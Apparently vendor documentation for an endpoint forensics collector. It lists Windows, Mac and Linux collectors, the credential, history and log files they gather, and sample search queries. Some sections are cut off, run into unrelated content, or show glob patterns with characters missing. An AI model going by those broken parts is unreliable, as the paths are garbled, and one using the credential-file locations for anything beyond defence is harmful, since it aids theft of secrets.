Collects metadata from the Volume Shadow Copy Service (VSS). This collector is not in the default configuration.

Events generated

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded. Path is required for this collector.	No
File Operations	Multiple selection	The file operations to include in this collection.	No
Guess VSS Device Object Paths	Boolean	Guess VSS device object paths if API fails.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Include Filter	String	Regular expression pattern for including paths.	No
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt. Default: .	No
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	No
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No
Recursive Listing	Boolean	Enables recursive directory scanning.	No
Only PE	Boolean	Only report on executable files.	No
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

Weblog

Collects entries from IIS and Apache web server logs. This collector is not in the default configuration.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options

Option	Type	Description	In default configuration?
Before Date	Date	Report events generated on or before this UTC date.	No
After Date	Date	Report events generated on or after this UTC date.	No
Process Last Lines	Integer	Only process the last specified number of lines of each log file.	No
Process Top Lines	Integer	Only process the top specified number of lines of each log file.	No
Days to Report	Integer	Report events generated within the last given number of days.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No
Avoidance Filter	String	Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection.	No

WebShell

Collects metadata related to webshell script files (identified with an algorithm).

Events generated

WebShellDetected: To identify WebShell script files in a target folder, the content of each text file is matched against a large built-in list of regular expressions.

Configurable options

Option	Type	Description	In default configuration?
Starting Directory	Selection	Must select Automatically Determine Web Root Directories or Path.	Yes. Automatically determine web root directories
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, fileid, name, owner, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Scan All Drives	Boolean	Enumerate all fixed drives and substitute each in `<path>`.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Include Filter	String	Regular expression pattern for including paths.	No
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt.	No. Collector defaults to .
Maximum File Size	Integer	Maximum size considered as webshell file, in bytes.	Yes
Minimum File Size	Integer	Minimum size considered as webshell file, in bytes.	Yes. 64
Recursive Listing	Boolean	Enables recursive directory scanning.	Yes
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	No
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No
Collect First Bytes	Boolean	Collect and report first 'n' bytes of file.	Yes. 256
Minimum Rating Percentage	Integer	Only report on ratings at or above this percentage.	No
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

WMI

Issues a Windows Management Instrumentation (WMI) query and collects the results of the query. There are multiple collectors in the default configuration.

Events generated

WmiQuery: Windows Management Instrumentation (WMI) query status.

Configurable options

Option	Type	Description	In default configuration?
WMI Query	String	WMI query to execute.	No
WMI Namespace	String	Namespace to query. Default: 'Root\Cimv2'	No
Properties	String	Properties to collect. Default: all	No
Output As JSON	Boolean	Output results in JSON format.	Yes
Do Not Output As JSON	Boolean	Disable JSON output format.	No

Default configuration examples

Event subscription queries

WMI Query	Namespace
SELECT * FROM __EventConsumer	Root\Subscription
SELECT * FROM __EventFilter	Root\Subscription
SELECT * FROM __FilterToConsumerBinding	Root\Subscription

Security center queries

WMI Query	Namespace
SELECT * FROM AntiVirusProduct	Root\SecurityCenter2
SELECT * FROM AntiVirusProduct	Root\SecurityCenter

Software monitoring queries

WMI Query	Namespace	Properties
Select * from CCM_RecentlyUsedApps	Root\CCM\SoftwareMeteringAgent	LastUsedTime, AdditionalProductCodes, CompanyName, ExplorerFileName, FileDescription, FilePropertiesHash, FileSize, FileVersion, FolderPath, LastUserName, LaunchCount, msiDisplayName, msiPublisher, msiVersion, OriginalFileName, ProductCode, ProductLanguage, ProductName, ProductVersion, SoftwarePropertiesHash

WLAN

Collects information about wireless local network (WLAN) interfaces and available networks.

Events generated

WlanInterfaceInfo: Contains information about the wireless LAN interface.

Configurable options

Option	Type	Description	In default configuration?
Ignore Private MAC Addresses	Boolean	Ignore private MAC addresses in the Basic Service Set Identifier (BSSID) list.	Yes
Sort BSSID List	Boolean	Sort the list of BSSIDs.	Yes

YARA

Issues YARA rules and collects the results. This collector is not in the default configuration.

Events generated

FfcBytePatternScanResult: Result of a Yara scan.

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options

Option	Type	Description	In default configuration?
Scan Active Processes Memory	Boolean	Enable scanning of active process memory.	No
Scan Process Executable Files	Boolean	Enable scanning of process executable files.	No
Scan Process Modules	Boolean	Enable scanning of process modules.	No
Process ID	Integer	Specific process ID to scan.	No
Scan Files	Boolean	Enable file scanning.	No
Web Root	String	Automatically add and target IIS web root directories.	No

Yara rules configuration

Option	Type	Description	In default configuration?
YARA Rules Directory	String	Directory containing YARA rule files.	Yes
YARA Rule File Mask	String	YARA rule file name mask.	Yes
YARA Include Filter	String	YARA rule file path inclusion regex filter pattern.	No
YARA Exclude Filter	String	YARA rule file path exclusion regex filter pattern.	No
YARA Recursive	Boolean	Recurse into YARA rules directory.	No
YARA Text Rules	String	Embed YARA rules directly within the config file.	No

Target path configuration

Option	Type	Description	In default configuration?
Target Path	String	The directory path to scan. Environment and app variables are automatically expanded.	No. Collector defaults to current directory.
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt.	No. Collector defaults to .
Include Filter	String	Regular expression pattern for including paths.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Avoidance Filter	String	Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection.	No
Target Recursive	Boolean	Recurse into target directories	No
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	No
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No

File operations and limits

Option	Type	Description	In default configuration?
File Operations	Multiple selection	The file operations to include in this collection.	No
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Maximum Target Size	String	Maximum size of targets to scan. Default is megabytes, but you can use B, KB, MB, or GB.	No
Maximum Memory Size	String	Maximum memory size to scan. Default is megabytes, but you can use B, KB, MB, or GB.	No

Scan options

Option	Type	Description	In default configuration?
Fast Mode	Boolean	Use YARA fast mode matching.	No
Show Hits And Misses	Boolean	Show scan misses along with positive hits.	No
Verbose	Boolean	Enable additional informational output.	No

ZIP

Collects directory listing and analysis of ZIP files. This collector is not in the default configuration.

Events generated

ArchiveInfo: Information about an archive file.

ArchiveMemberInfo: Information about a file inside of an archive.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	No
File Operations	Multiple selection	The file operations to include in this collection.	No
Zip Content Operations	Multiple selection	File operations for files inside archive.	No
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt. Default: *.zip	No
Zip Content Mask	String	File name mask for files inside archive.	No
Scan All Drives	Boolean	Enumerate all fixed drives and substitute each in `<path>`.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Zip Content Exclude Pattern	String	Regular expression pattern for excluding paths within ZIP files.	No
Include Filter	String	Regular expression pattern for including paths.	No
Zip Content Include Pattern	String	Regular expression pattern for including paths within ZIP files.	No
Maximum Entries	Integer	Maximum number of entries to collect. . Default: unlimited	No
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	No
Recursive Listing	Boolean	Enables recursive directory scanning.	No
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

Mac collectors

AppleSystemLog

Collects Apple System Log (ASL) events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options

Option

Type

Description

In default configuration?

Path

String

The directory path to scan.

Yes.

/private/var/log/asl/*.asl

Maximum items

Integer

Maximum number of log entries to collect.

Yes.

5000

Maximum Age

String

Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d

Yes.

30d

AppleUnifiedLog

Collects Apple Unified Log (AUL) events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options

Option	Type	Description	In default configuration?
Path	String	Specify a directory path.	Yes. /private/var/db/diagnostics
Maximum Age	String	Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d	No
Maximum items	Integer	Maximum number of entries to collect.	No
Predicates	Multiple selection	Select common predefined filter expressions.	Yes. See Predefined predicates reference.
Custom Predicate	String	Enter a single predicate expression. For example, 'process == kernel'	No

Predefined predicates reference

Predicate	Filter expression
sudo	process == "sudo" && eventMessage CONTAINS[c] "User=root" && (NOT eventMessage CONTAINS[c] "root : PWD=/ ; USER=root") && (NOT eventMessage CONTAINS[c] " root : PWD=")
logind	`process == "logind"`
tccd	`process == "tccd"`
sshd	`process == "sshd"`
kextd	`(process == "kextd" && sender == "IOKit")`
screensharingd	`(process == "screensharingd"`
security	`(process == "loginwindow" && sender == "Security")`
sessions	(process == "securityd" && eventMessage CONTAINS "Session" && subsystem == "com.apple.securityd")
loginwindow	(eventMessage contains "com.apple.sessionagent.screenIs") OR (processImagePath contains "loginwindow" and eventMessage contains "com.apple.sessionDidLogin") OR (eventMessage contains "com.apple.system.loginwindow")

Applications

Collects information about installed applications.

Events generated

InstalledApplication: This event contains all the information for a single app.

Configurable options

Option	Type	Description	In default configuration?
Glob pattern	String	Specify a glob pattern to match and limit collected data.	Yes /Library/Receipts/InstallHistory.plist /private/var/db/receipts/.plist /Library/Apple/System/Library/Receipts/.plist

Audit

Collects various system audit events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options

Option

Type

Description

In default configuration?

Path

String

Specify a directory path.

Yes.

/private/var/audit/[0-9]*.[0-9]*

Maximum items

Integer

Maximum number of entries to collect.

Yes.

20000

Maximum Age

String

Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d

Yes.

100d

Auto Runs

Collects information on programs that are run automatically.

Events generated

AutoRunProcessInfo: Informational event on a process that was executed automatically.

Configurable options

None

Browser: Chrome

Collect browser history, downloads, and other artifacts from the Chrome web browser.

Events generated

BrowserAccountInfo: Information about a browser’s user accounts.

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension and addon information.

BrowserHistoryVisit: Information about a browser history entry.

BrowserHistoryClearInfo: Browser history clearing event information.

Configurable options

Option

Type

Description

In default configuration?

Record limit

Integer

Maximum number of records to collect. Each item can be a history entry, download record, cookie, or browser extension.

Yes.

1000

Browser: Firefox

Collect browser history, downloads, and other artifacts from the Firefox web browser.

Events generated

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension and addon information.

BrowserHistoryVisit: Information about a browser history entry.

BrowserProxyInfo: Information about a proxy in the browser.

Configurable options

Option

Type

Description

In default configuration?

Record limit

Integer

Maximum number of records to collect. Each item can be a history entry, download record, cookie, or browser extension.

Yes.

1000

Browser: Safari

Collect browser history, downloads, and other artifacts from the Safari web browser.

Events generated

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension and addon information.

BrowserHistoryVisit: Information about a browser history entry.

Configurable options

Option

Type

Description

In default configuration?

Record limit

Integer

Maximum number of records to collect. Each item can be a history entry, download record, cookie, or browser extension.

Yes.

LocalIpAddressIP4: Describes an IPv4 Address on the machine.

LocalIpAddressIP6: Describes an IPv6 Address on the machine.

Configurable options

None

IP Connections

Collects Network ReceiveAccept, NetworkConnect, NetworkListen, and NetworkClose types both IP4/6.

Events generated

NetworkListenIP4: IPv4 Network listen event.

NetworkReceiveAcceptIP4: IPv4 network SYN event.

NetworkConnectIP4: IPv4 network connect event.

NetworkCloseIP4: IPv4 network close event. RouteIP4 - IPv4 route entry.

NetworkListenIP6: IPv6 Network listen event.

NetworkReceiveAcceptIP6: IPv6 network SYN event.

NetworkConnectIP6: IPv6 network connect event.

NetworkCloseIP6: IPv6 network close event.

Configurable options

None

IP Routes

Collects IP4/6 route information.

Events generated

Events generated

MacKnowledgeActivityStart: An entry from a KnowledgeC database indicating the start of some user activity on a macOS system.

MacKnowledgeActivityEnd: An entry from a KnowledgeC database indicating the end of some user activity on a macOS system.

Configurable options

Option

Type

Description

In default configuration?

Glob pattern

String

Glob path to KnowledgeC database.

Yes.

/Users/*/Library/Application\ Support/*/knowledgeC.db

Line

Collects information contained in various log files and reconstructs logs line by line. There are multiple collectors for Line to cover multiple sources. For more info, see Default configuration examples.

Events generated

FileEntry: Some portion of a text file, either a single line or matched regular expression.

Configurable options

Option	Type	Description	In default configuration?
Glob pattern	String	Specify a glob pattern to match and limit collected data.	No
Log file type	Multiple selection	Specifies the type of log file to process.	No

Default configuration examples

SSH configuration files

Name	Glob pattern	Log file type
ssh-config	/Users/*/.ssh/config	FILE_SSH_CONFIG
authorized-keys	/Users/*/.ssh/authorized_keys	FILE_AUTHORIZED_KEYS
authorized-keys-root	/root/*/authorized_keys	FILE_AUTHORIZED_KEYS
known-hosts	/Users///known_hosts	FILE_KNOWN_HOSTS
known-hosts-root	/root/*/known_hosts	FILE_KNOWN_HOSTS

Shell configuration files

Name	Glob pattern	Log file type
user-rc	/Users//rc	FILE_SHELL_CONFIG
user-profile	/Users//profile	FILE_SHELL_CONFIG
rc	/etc/rc	FILE_SYSTEM_CONFIG
root-rc	/root/rc	FILE_SYSTEM_CONFIG
sub-root-rc	/root/*/rc	FILE_SYSTEM_CONFIG
etc-profile	/etc/profile	FILE_SYSTEM_CONFIG

System authentication files

Name	Glob pattern	Log file type
pam.d	/etc/pam.d/	FILE_SYSTEM_AUTH
etc-security	/etc/security/	FILE_SYSTEM_AUTH
log-secure	/var/log/secure*	FILE_SYSTEM_AUTH
sudoers	/etc/sudoers	FILE_SYSTEM_AUTH

Scheduled tasks

Name	Glob pattern	Log file type
at	/var/at/*/	FILE_SCHEDULED

MacMRU

Collects sfl/sfl2 for most recently used (MRU) files.

Events generated

MacMRU: A digital forensics record derived from Apple SharedFileList (.sfl/.sfl2) files. This event helps identify most recently used resources such as applications, documents, volumes.

Configurable options

Option

Type

Description

In default configuration?

Glob pattern

String

Specify a glob pattern to match and limit collected data.

Yes.

Two collectors:

/Users/*/Library/Application\ Support/*/*.sfl* /private/var/root/Library/Application Support/*/*.sfl*

MacSpotlight

Collects information on per-user Spotlight search information. Mac Spotlight gathers information from 4 different sources.

Events generated

SpotlightSearchEntry: Per-user spotlight search information.

Configurable options

Option

Type

Description

In default configuration?

Glob pattern

String

Specify a glob pattern to match and limit collected data.

Yes.

4 sources:

useractivities-users-spotlight: /Users/*/Library/Application Support/com.apple.spotlight/com.apple.spotlight.Shortcuts*

useractivities-private-spotlight: /private/var/*/Library/Application Support/com.apple.spotlight.Shortcuts

useractivities-users: /Users/*/Library/Application Support/com.apple.spotlight.Shortcuts

useractivities-users-preferences-spotlight: /Users/*/Library/Preferences/com.apple.spotlight.Shortcuts

NetUsage

Collects network usage on endpoints and processes.

Events generated

NetworkEndPointDataUsage: This event has total counts of sent and received octets and packets to and from the network-attached end point during active connection. The counting window is the life of the end point.

ProcessDataUsage: Measurements and statistics of data traffic sent and received to and from the target process.

Configurable options

Option

Type

Description

In default configuration?

Glob pattern

String

Specify a glob pattern to match and limit collected data.

Yes.

Two collectors:

/private/var/networkd/netusage.sqlite /private/var/networkd/db/netusage.sqlite

Processes

Collects information on currently running processes at time of collection.

Events generated

ProcessRollup2: Running process observed at collection time.

Configurable options

None

Quarantines

Collects information from files with the quarantine extended attribute.

Events generated

LSQuarantineEvent: A database record indicating that the system quarantined a file.

QuarantineXattribute: A file xattribute value indicating that the system quarantined a file.

Configurable options

Option

Type

Description

In default configuration?

Quarantine Databases

String

Comma-separated list of paths to quarantine event databases on the local machine.

Yes.

/Users/*/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2

Scan Location

String

Location that should be scanned for the QuarantineXattribute. Max depth of 1.

Yes.

/Users/*/Downloads

System Extensions

Collects information on loaded System Extensions.

Events generated

SystemExtension: Describes a macOS system extension identified by the collector.

Configurable options

None

SystemLog

Collects information from various log files.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options

Option

Type

Description

In default configuration?

Path

String

Specify a directory path.

Yes.

/var/log/system.log*

Maximum items

Integer

Maximum number of entries to collect.

Yes.

50000

Maximum Age

String

Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d

Yes.

Option

Type

Description

In default configuration?

Path

String

Specify a directory path.

Yes.

var/run/utmpx

Maximum items

Integer

Maximum number of entries to collect.

Yes.

10000

Maximum Age

String

Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d

Yes.

None

Linux collectors

Applications

Collects information about installed applications.

Events generated

InstalledApplication: This event contains all the information for a single app.

Configurable options

Option

Type

Description

In default configuration?

Glob pattern

String

Specify a glob pattern to match and limit collected data.

Yes.

/var/lib/dpkg/status

/var/lib/rpm/Packages

/var/lib/rpm/Packages.db

/var/lib/rpm/rpmdb.sqlite

Audit

Collects various system audit events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options

Option

Type

Description

In default configuration?

Path

String

Specify a directory path.

Yes.

/var/log/audit/audit*

Maximum items

Integer

Maximum number of entries to collect.

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension and addon information.

BrowserHistoryVisit: Information about a browser history entry.

BrowserProxyInfo: Information about a proxy in the browser.

Configurable options

Option

Type

Description

In default configuration?

Record limit

Integer

Maximum number of records to collect. Each item can be a history entry, download record, cookie, or browser extension.

Yes.

LocalIpAddressIP4: Describes an IPv4 Address on the machine.

LocalIpAddressIP6: Describes an IPv6 Address on the machine.

Configurable options

None

IP Connections

Collects Network ReceiveAccept, NetworkConnect, NetworkListen, and NetworkClose types both IP4/6.

Events generated

IPv4:

NetworkListenIP4: IPv4 Network listen event.
NetworkReceiveAcceptIP4: IPv4 network SYN event.
NetworkConnectIP4: IPv4 network connect event.
NetworkCloseIP4: IPv4 network close event.

IPv6:

NetworkListenIP6: IPv6 Network listen event.
NetworkReceiveAcceptIP6: IPv6 network SYN event.
NetworkConnectIP6: IPv6 network connect event.
NetworkCloseIP6: IPv6 network close event.

Configurable options

None

IP Routes

Collects IP4/6 route information.

Events generated

Events generated

FileEntry: Some portion of a text file, either a single line or matched regular expression.

Configurable options

Option	Type	Description	In default configuration?
Glob pattern	String	Specify a glob pattern to match and limit collected data.	No
Log file type	Multiple selection	Specifies the type of log file to process.	No

Default configuration examples

Shell history files

Name	Glob pattern	Log file type
shell-history-home	/home//_history	FILE_SHELL_HISTORY
shell-history-root	/root/*_history	FILE_SHELL_HISTORY

SSH configuration files

Name	Glob pattern	Log file type
ssh-config	/home/*/.ssh/config	FILE_SSH_CONFIG
authorized-keys	/home/*/.ssh/authorized_keys	FILE_AUTHORIZED_KEYS
authorized-keys-root	/root/*/authorized_keys	FILE_AUTHORIZED_KEYS
known-hosts	/home///known_hosts	FILE_KNOWN_HOSTS
known-hosts-root	/root/*/known_hosts	FILE_KNOWN_HOSTS

Scheduled tasks

Name	Glob pattern	Log file type
/etc/cron	/etc/cron*	FILE_SCHEDULED
cron-spool	/var/spool/cron/*/	FILE_SCHEDULED
cron-directories	/etc/cron/*	FILE_SCHEDULED
at	/etc/at*	FILE_SCHEDULED

System configuration files

Name	Glob pattern	Log file type
systemd	/etc/systemd//	FILE_SYSTEM_CONFIG
rc	/etc/rc	FILE_SYSTEM_CONFIG
root-rc	/root/rc	FILE_SYSTEM_CONFIG
sub-root-rc	/root/*/rc	FILE_SYSTEM_CONFIG
rc.d	/etc/rc.d/	FILE_SYSTEM_CONFIG
sysctl	/etc/sysctl.d/*	FILE_SYSTEM_CONFIG
etc-hosts	/etc/*hosts	FILE_SYSTEM_CONFIG
etc-conf	/etc/*conf	FILE_SYSTEM_CONFIG

System startup files

Name	Glob pattern	Log file type
init	/etc/init/	FILE_SYSTEM_START
systemv-inittab	/etc/inittab*	FILE_SYSTEM_START

User configuration files

Name	Glob pattern	Log file type
user-rc	/home//rc	FILE_SHELL_CONFIG
user-profile	/home//profile	FILE_SHELL_CONFIG
etc-profile	/etc/profile	FILE_SYSTEM_CONFIG

System authentication files

Name	Glob pattern	Log file type
lib-security	/usr/lib/security/*	FILE_SYSTEM_AUTH
pam.d	/etc/pam.d/	FILE_SYSTEM_AUTH
etc-security	/etc/security/	FILE_SYSTEM_AUTH
log-secure	/var/log/secure*	FILE_SYSTEM_AUTH
sudoers	/etc/sudoers	FILE_SYSTEM_AUTH

Processes

Collects information on currently running processes at time of collection.

Events generated

ProcessRollup2: Running process observed at collection time.

ProcessOpenedFileDescriptor: Indicates that a process has opened a file, socket, or library.

FileDescriptorMonitor: Indicates that a file descriptor is being monitored.

Configurable options

None

SystemLog

Collects information from various log files.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options

Option

Type

Description

In default configuration?

Path

String

Specify a directory path.

Yes.

/var/log/system.log*

Maximum items

Integer

Maximum number of entries to collect.

Yes.

various

Maximum Age

String

Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d

Yes.

100d

Default configuration examples

Authentication logs

Name	Path	Maximum items
syslog-sudo	/var/log/sudo*	10000
syslog-su	/var/log/su	10000
syslog-auth	/var/log/auth*	10000
syslog-secure	/var/log/secure*	10000
syslog-ssh	/var/log/ssh*	10000

System logs

Name	Path	Maximum items
syslog-crit	/var/log/crit*	10000
syslog-messages	/var/log/messages*	10000
syslog-system	/var/log/system*	10000
syslog-syslog	/var/log/syslog*	10000
syslog-daemon	/var/log/daemon*	10000
syslog-cron	/var/log/cron*	10000

Kernel and boot logs

Name	Path	Maximum items
kernel-log	/var/log/kern*	5000
dmesg-log	/var/log/dmesg*	5000
boot-log	/var/log/boot*	5000

Application logs

Name	Path	Maximum items
falcon-log	/var/log/falcon*	5000
nginx-logs	/var/log/nginx/*	10000
samba-logs	/var/log/samba/*	10000
apache-logs	/var/log/apache/	10000
www-logs	/var/log/www/*	10000
php-logs	/var/log/php*	10000
httpd-logs	/var/log/httpd/*	10000
tomcat-logs	/var/log/tomcat/	10000
fail2ban-logs	/var/log/fail2ban*	10000
squid-logs	/var/log/squid/*	10000

Users

Collects information on user and group accounts on a system.

Events generated

UserIdentity: Information about an observed user account.

GroupIdentity: Information about user group name, GID, and names, UIDs and sid of user members.

UserAccountDeleted: Information about a deleted user account.

Configurable options

Option

Type

Description

In default configuration?

Sources

Multiple selection

Select user information sources to collect. Sources include: files, ldap, systemd

Yes.

files

UTmpLog

Collects information on user terminal login and logout events.

Events generated

LogEntry: A log entry observed on an endpoint.

Configurable options

Option

Type

Description

In default configuration?

Path

String

Specify a directory path.

Yes.

various

Maximum items

Integer

Maximum number of entries to collect.

Yes.

10000

Maximum age

String

Maximum age of log entries to collect. Valid units: ns, us (or µs), ms, s, m, h, d

Yes.

100d

Default configuration examples

Name	Path
wtmp	/var/log/wtmp*
btmp	/var/log/btmp*
lastlog	/var/log/lastlog
run-utmp	/run/utmp

Volumes

Collects information on all mounted disks.

Events generated

FsVolumeMounted: Information about a volume that has been observed.

Configurable options

None

YARA

Issues YARA rules and collects results. This collector is not in the default configuration.

Events generated

FfcBytePatternScanResult: Result of a YARA scan.

Configurable options

Option	Type	Description	In default configuration?
Directory paths	String	Directory path(s) to scan. Can specify multiple paths separated by newlines.	No
File paths	String	Specific file path(s) to scan. Can specify multiple paths separated by newlines.	No
YARA text rules	String	Embed YARA rules directly within the config file	No

Falcon Forensics Query Sheet for Windows

Example queries to be used in advanced event search to investigate ingested Forensics data in Windows.

Tips for searches

Improve the efficiency and effectiveness of your Falcon Forensics searches by using ForensicsCollectionIdentifier, AID, and certain techniques to limit the scope of data, leverage joins efficiently, and take advantage of grouping functions. You can also apply case-sensitivity options for more precise results.

When searching, it's recommended to use ForensicsCollectionIdentifier or AID to help reduce the search time. Falcon Forensics can create many events, which can take a long time to parse through. By using a Collection ID or AID, it can reduce this time. This recommendation doesn't apply if you're searching environment-wide, of course. If you're looking for a specific file, you should try using the FileInfo event.

Regarding FfcFileIdentifier: these are only going to be useful within the specific collection, as it uses the filesystem's UUID and the file's inode value. Because of this, the FfcFileIdentifier will be different across many machines. It's recommended to use this identifier to tie events together from a single collection, as many events have this field versus something like the SHA256 hash.

Joins can be rather resource-intensive, so the best way to do them is to limit the amount of data by using ForensicsCollectionIdentifier or AID to reduce the amount of searching. You can do a join without these, but it might take more time to perform the searches and may be limited. However, if you're searching for a commonality in your environment, you can use any filtering criteria. Using something like FfcFileIdentifier to find across your environment won't work as these are created unique to the system. You can use joins in any searches that have common fields.

In the searches on this page, you'll notice many groupBy statements, and these are some of the best ways to group values together. For example, if you're looking for a specific hash you would group by SHA256HashData while collecting other important fields. This groups all of the resultant data into a table.

These are examples of case sensitivity in searches.

HostName=Test only matches hosts named "Test"
HostName=/test/i matches test, Test, TeSt, or any similar combination

System

ForensicsCollectorOnline

Show All Fields for ForensicsCollectorOnline

#event_simpleName = ForensicsCollectorOnline ForensicsCollectionIdentifier = * FfcPlatform = FFC_PLATFORM_WINDOWS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcCollectionTag, FfcExecutableName, FfcExecutablePath, FfcVersion, PhysicalAddress, LocalAddressIP4, LocalAddressIP6, DomainName, UserIsAdmin, IsVirtualMachine], limit=max)

Note: This can be queried to see if a collection started on a Windows Host.

ForensicsCollectorOffline

Show all fields for ForensicsCollectorOffline

#event_simpleName = ForensicsCollectorOffline ForensicsCollectionIdentifier = * FfcPlatform = FFC_PLATFORM_WINDOWS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath], limit=max)

ForensicsCollectorLog

Show all fields for ForensicsCollector Log

#event_simpleName = ForensicsCollectorLog ForensicsCollectionIdentifier = * | "Log Text" := rename(FfcCollectorLogText) | Module := rename(FfcModule) | "Log Level" := rename(FfcLogLevel) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, id, "Log Level", Module, "Log Text", #event_simpleName, name], limit=max)

OsVersionInfo

Show all fields for OsVersionInfo

#event_simpleName=OsVersionInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, MajorVersion, MinorVersion, PlatformId, BuildNumber, ServicePackMajor, ServicePackMinor, SuiteMask, ProductType, BuildType, AgentVersion, ProductName, OSVersionFileName, OSVersionFileData, SystemTimeZone], limit=max)

Amcache

Show All Fields for AmCacheEntry

#event_simpleName=AmcacheEntry ForensicsCollectionIdentifier = *| LastVolumeRegWrite := parseTimestamp(field="LastVolumeRegWrite", format=seconds)| LastVolumeRegWrite := formatTime(format="%F %T", field="LastVolumeRegWrite")| LastFileRegWrite :=formatTime("%Y-%m-%d %H:%M:%S")| LastFileRegWrite := parseTimestamp(field="LastFileRegWrite", format=seconds)| LastFileRegWrite := formatTime(format="%F %T", field="LastFileRegWrite")| table([ContextTimeStamp, ForensicsCollectionIdentifier, aid, ProgramUUID, VolumeName, LastVolumeRegWrite, AmFileId, LastFileRegWrite, ProductName, CompanyName, AmFileVersionNumber, FileVersion, PeHashData, FileDescription, SHA1HashData, ModifyTime, CreateTime, ProductVersion, FileVersion, LanguageId, Size, ImageCheckSum, ImageCompilationDate, LinkerVersion, AmSwitchBackContext, AmIsLocal, AmGuessProgramId, TargetFileName, AppArchitecture], limit=max)

One or two character file names

#event_simpleName=AmcacheEntry ForensicsCollectionIdentifier = * | length(AmFileId) | _length <= 2 | groupBy([AmFileId], function=collect([TargetFileName,SHA1HashData]))

BAM

Show all fields for BamRegAppRunTime

